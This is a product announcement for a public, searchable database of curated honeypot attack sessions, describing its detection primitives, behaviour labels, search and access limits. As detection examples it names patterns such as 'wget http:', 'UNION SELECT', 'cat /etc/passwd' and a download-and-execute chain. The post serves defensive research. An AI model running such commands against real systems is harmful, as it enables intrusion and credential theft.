Introducing the Attack Session Database: Raw Honeypot Sessions, Searchable and Annotated

We've been capturing attacker behavior across 15+ protocols since we launched. Millions of events per day: every credential attempt, every command, every query, recorded and processed by our sensor network. Until now, that data lived exclusively behind our API and internal tooling.

Today we're making raw attack sessions available in a new public-facing database at /sessions. It's in beta, it's searchable, and every session is individually curated before publication.

What You're Looking At

Each entry in the database is a complete attack session captured by one of our honeypot sensors. A session starts when an attacker connects and ends when they disconnect or time out. Everything they do in between (authentication attempts, commands executed, queries run, files requested) is recorded as a sequence of events.

Here's what a published session includes:

• Protocol: which service the attacker targeted (SSH, HTTP, MySQL, Redis, Docker, FTP, SMTP, PostgreSQL, MongoDB, SMB, Telnet, and more)
• Events: the full sequence of attacker inputs in order, with timestamps
• Behavioral analysis: if the session matches a known attack pattern, it's labeled with a behavior name, description, and risk level
• Matched primitives: individual attack indicators detected within the session, linked to the specific events that triggered them
• Duration: how long the session lasted

Sessions are displayed in an event viewer that lets you step through exactly what the attacker did. If primitives matched, you can click them to highlight the corresponding events.

What Behavioral Analysis Means Here

Our backend runs a two-tier detection system against every session:

Primitives are atomic pattern matches. A single rule that fires against a single event field. For example, a primitive might match any SSH command containing wget http: or any MySQL query with a UNION SELECT pattern. Each primitive has a name and description that explains what it detects.

Behaviors are composed of primitives. A behavior defines a complete attack chain. For instance, "download and execute" requires both a download primitive (wget or curl) and an execution primitive to match in the same session. When a behavior matches, the session gets a risk level: critical, high, medium, low, or info.

Not every session triggers a behavior match. Some sessions are simple credential sprays where an attacker tries root/admin and disconnects. Those sessions still have value as data points, but they won't carry a behavior label.

You can explore the full catalog of primitives and behaviors we detect at /threats/catalog.

Search and Filtering

The database supports full-text search across:

• Publication IDs: every session has a unique ID in the format PUB-YYYY-MMDD-NNNN
• Behavior names: search for attack patterns like "downloadandexecute" or "credentialfileaccess"
• Primitive names: find sessions that triggered specific detection rules
• Raw event data: search for actual commands, queries, URLs, and payloads that appeared in sessions

You can also filter by protocol and sort by newest, oldest, longest duration, or highest primitive count.

This means you can search for something like cat /etc/passwd and find every published session where an attacker ran that command. Or search for UNION SELECT to find SQL injection sessions. Or filter to Docker and sort by primitive count to find the most complex container exploitation chains.

What Gets Published

Not every session we capture ends up in the database. Sessions are curated and reviewed before publication. The process:

1. Our team selects sessions that demonstrate interesting or representative attack behavior
2. Each session is reviewed and sanitized. Honeypot response data is stripped to prevent fingerprinting our sensors, and sensitive fields can be redacted
3. The sanitized session is published with its behavioral analysis and primitive matches

This means the database is not a firehose of raw logs. It's a curated collection of sessions chosen because they illustrate real attacker techniques across different protocols.

Access and Rate Limits

The database is free to access during the beta period:

• Without an account: 5 session lookups per day
• With a free account: Unlimited access to the full database during the beta

There's no paywall on the data. The daily limit for unauthenticated users exists to prevent automated scraping, not to restrict legitimate use. Creating an account takes 30 seconds and removes the limit entirely.

You can register here for free.

Protocol Coverage

Sessions are available across every protocol our sensors support:

More protocols will appear in the database as we publish sessions from our full sensor coverage.

Why We Built This

Our API provides comprehensive IP reputation scoring, behavioral classification, geolocation, risk assessment, and detection across 15+ protocols. It's built for automated integration: block malicious IPs, enrich SIEM alerts, monitor your infrastructure in real time.

The session database adds a different dimension. Instead of querying what an IP did, you can see exactly how an attack unfolded: the full sequence of commands, queries, and payloads from connection to disconnect. Researchers get real attack data to study. Security teams get concrete examples of what threats look like across different protocols. Detection engineers can search for specific techniques to understand how they're used in the wild.

What's Next

This is a beta launch. The database will grow as we publish more sessions across more protocols. We're prioritizing variety, with sessions that demonstrate different attack techniques, different protocols, and different levels of sophistication.

The session viewer, search functionality, and filtering are all functional but will continue to improve based on how people actually use the database.

Browse the database: sikkerapi.com/sessions

Detection catalog: sikkerapi.com/threats/catalog

Create a free here.